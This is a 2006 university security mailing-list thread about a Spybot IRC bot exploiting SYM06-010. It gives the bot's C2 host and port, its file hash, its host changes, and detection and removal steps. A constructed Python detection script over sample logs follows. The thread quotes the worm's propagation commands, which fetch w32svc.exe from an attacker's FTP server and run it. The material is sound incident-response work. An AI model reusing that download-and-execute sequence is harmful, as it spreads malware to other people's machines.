[unisog] More: Bot outbreak exploiting SYM06-010

H. Morrow Long morrow.long at yale.edu
Tue Nov 28 14:02:40 GMT 2006


Symantec sent out a bulletin to their Platinum
customers last night detailing that there was a
new version of the W32.Spybot worm exploiting
SYM06-010 and pointing them to the malware
description web page :

  http://www.symantec.com/avcenter/security/Content/2006.05.25.html

It says that signature files #61675 and later
will be available today (11/28) with the sig
of the new variant.

- H. Morrow Long, CISSP, CISM, CEH
   University Information Security Officer
   Director -- Information Security Office
   Yale University, ITS



On Nov 28, 2006, at 12:09 AM, Liu, David wrote:

> Any idea on if the malware info has been made public on the Symantec
> site?
>
> -----Original Message-----
> From: unisog-bounces at lists.dshield.org
> [mailto:unisog-bounces at lists.dshield.org] On Behalf Of Brian Eckman
> Sent: Monday, November 27, 2006 7:02 PM
> To: UNIversity Security Operations Group
> Subject: [unisog] More: Bot outbreak exploiting SYM06-010
>
> We had a number of hosts become infected with an IRC bot today that used
> www.flackware.info as the Command and Control. Here is information that
> I know so far:
>
> ===================
> Command and Control
> ===================
> . www.flackware.info:6667/tcp (the only apparent name/port used)
> . (auto)JOIN #text airforce
>
> =========
> File Info
> =========
> . MD5(w32svc.exe)= 44a48fb5813d79c9a733bc941a9a548f
> . w32svc.exe is 1.12 MB (1,182,208 bytes)  (MASSIVE for a bot!)
> . Symantec definitions 11/27/2006 rev.50 and later will detect it as a
> Spybot variant
>
> =============
> How to Obtain
> =============
> The bot uses a built-in FTP server ("Reptile", a.k.a. "StnyFTPd") to
> spread. When it compromises a machine, it executes the following
> commands:
>
> echo open (ip address of attacker) (ftp server port) > i
> echo user 1 1 >> i
> echo get w32svc.exe >> i
> echo quit >> i
> ftp -As:i
> w32svc.exe
> exit
>
> ========
> When Run
> ========
> . Installs itself to %WINDIR%\w32svc.exe
> . Sets Windows File Protection to "Scan only at bootup"
> . Moves ftp.exe and tftp.exe to %WINDIR%\System32\Microsoft\backup.ftp
> and backup.tftp
> . Drops a new ftp.exe and tftp.exe to %WINDIR%\System32\
> . Attempts to connect to the Command and Control server
> . Installs itself as a service in many places within the registry
>
> =================
> Infection Vectors
> =================
> . Almost certainly via SYM06-010
> . Almost certainly other Windows vulnerabilities (since patched)
>
> ==============================
> Detecting Infections - Network
> ==============================
> . Looking for DNS queries for www.flackware.info
> . Looking for network traffic to port 6667/tcp going to the IP address
> for www.flackware.info
> . Looking for scanning (more than 3-4 destinations) on port 2967/tcp
>
> =======================================
> Identifying Infection - At the Computer
> =======================================
> . Look for %WINDIR%\w32svc.exe
> . Look for a Service called "Windows Network Firewall"
>
> =======
> Removal
> =======
> Symantec definitions 11/27/2006 rev.50 performed admirably on my test
> box. Assuming the host did not have any other malware loaded onto it
> after infection, updating the AV defs to that "rev" or later, scanning
> the hard drive, then rebooting when prompted should do the trick.
>
> Manual Removal: Set the "Windows Network Firewall" service to
> "Disabled", and reboot (you can't stop the service while it is running).
> Delete the w32svc.exe file, and preferably, remove the associated
> (dozens of) registry keys.
>
> Brian
>
> -- 
> Brian Eckman, Security Analyst
> University of Minnesota
> Office of Information Technology
> Security & Assurance
>
>
> _______________________________________________
> unisog mailing list
> unisog at lists.dshield.org
> https://lists.sans.org/mailman/listinfo/unisog

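An added example, not code from either post above: a Python script that turns Brian's network and host indicators (DNS queries for www.flackware.info, 6667/tcp to the C2 address, 2967/tcp fan-out to more than a handful of hosts, the w32svc.exe path and MD5, the "Windows Network Firewall" service) into a check that can be run over exported logs. The log formats, the client addresses, and the C2 address 192.0.2.10 (a documentation-range placeholder for whatever www.flackware.info resolved to at the time) are constructed assumptions; the indicator values themselves are the ones in the post.

```python
"""Apply the SYM06-010 bot indicators from the unisog post to log records.

Added illustration; the log formats, hosts and the C2 address 192.0.2.10
are constructed assumptions, not data from the original thread.
"""
from collections import defaultdict

C2_NAME = "www.flackware.info"
C2_IP = "192.0.2.10"       # ASSUMPTION: stand-in for the real resolution
C2_PORT = 6667             # the only C&C port reported in the post
SCAN_PORT = 2967           # Symantec Remote Management, SYM06-010
SCAN_MIN_TARGETS = 4       # "more than 3-4 destinations" on 2967/tcp
BOT_MD5 = "44a48fb5813d79c9a733bc941a9a548f"
BOT_SERVICE = "Windows Network Firewall"

# Constructed sample records: DNS log is "client qname",
# flow log is "src dst dport proto" (one record per line).
DNS_LOG = """\
10.1.1.5 www.example.edu
10.1.1.7 www.flackware.info
10.1.1.9 WWW.FLACKWARE.INFO.
"""

FLOW_LOG = """\
10.1.1.5 10.1.2.20 445 tcp
10.1.1.7 192.0.2.10 6667 tcp
10.1.1.9 10.1.3.1 2967 tcp
10.1.1.9 10.1.3.2 2967 tcp
10.1.1.9 10.1.3.3 2967 tcp
10.1.1.9 10.1.3.4 2967 tcp
10.1.1.9 10.1.3.5 2967 tcp
10.1.1.11 10.1.3.1 2967 tcp
10.1.1.11 10.1.3.1 2967 tcp
10.1.1.12 192.0.2.10 80 tcp
"""


def dns_hits(log):
    """Clients that resolved the C&C name (case- and trailing-dot-insensitive)."""
    hits = defaultdict(set)
    for line in log.splitlines():
        if not line.strip():
            continue
        client, qname = line.split()
        if qname.rstrip(".").lower() == C2_NAME:
            hits[client].add("dns:" + C2_NAME)
    return hits


def flow_hits(log):
    """Sources talking IRC to the C&C address, or fanning out on 2967/tcp."""
    hits = defaultdict(set)
    scan_targets = defaultdict(set)   # src -> distinct 2967/tcp destinations
    for line in log.splitlines():
        if not line.strip():
            continue
        src, dst, dport, proto = line.split()
        if proto.lower() != "tcp":
            continue
        dport = int(dport)
        if dst == C2_IP and dport == C2_PORT:
            hits[src].add(f"c2:{C2_IP}:{C2_PORT}")
        if dport == SCAN_PORT:
            scan_targets[src].add(dst)
    for src, targets in scan_targets.items():
        # Repeated hits on one host are not a scan; count distinct targets.
        if len(targets) >= SCAN_MIN_TARGETS:
            hits[src].add(f"scan:{SCAN_PORT}/tcp:{len(targets)}")
    return hits


def suspect_hosts(dns_log=DNS_LOG, flow_log=FLOW_LOG):
    """Merge both views into {host: sorted list of reasons}."""
    merged = defaultdict(set)
    for source in (dns_hits(dns_log), flow_hits(flow_log)):
        for host, reasons in source.items():
            merged[host] |= reasons
    return {host: sorted(reasons) for host, reasons in merged.items()}


def host_indicators(file_hashes, services):
    """Host-side check. file_hashes: {path: md5 hex}; services: display names."""
    found = []
    for path, md5 in file_hashes.items():
        if path.lower().endswith("\\w32svc.exe"):
            verdict = "md5 match" if md5.lower() == BOT_MD5 else "md5 differs, possible new variant"
            found.append(f"file:{path} ({verdict})")
    if any(s.lower() == BOT_SERVICE.lower() for s in services):
        found.append("service:" + BOT_SERVICE)
    return found


if __name__ == "__main__":
    for host, reasons in sorted(suspect_hosts().items()):
        print(host, ", ".join(reasons))
```

Note that 10.1.1.12, which only reaches the C2 address on 80/tcp, and 10.1.1.11, which hits the same 2967/tcp target twice, are not flagged: the post's indicators are the IRC port and the fan-out to distinct hosts, and matching on the bare address or on repeat connections would sweep in unrelated traffic.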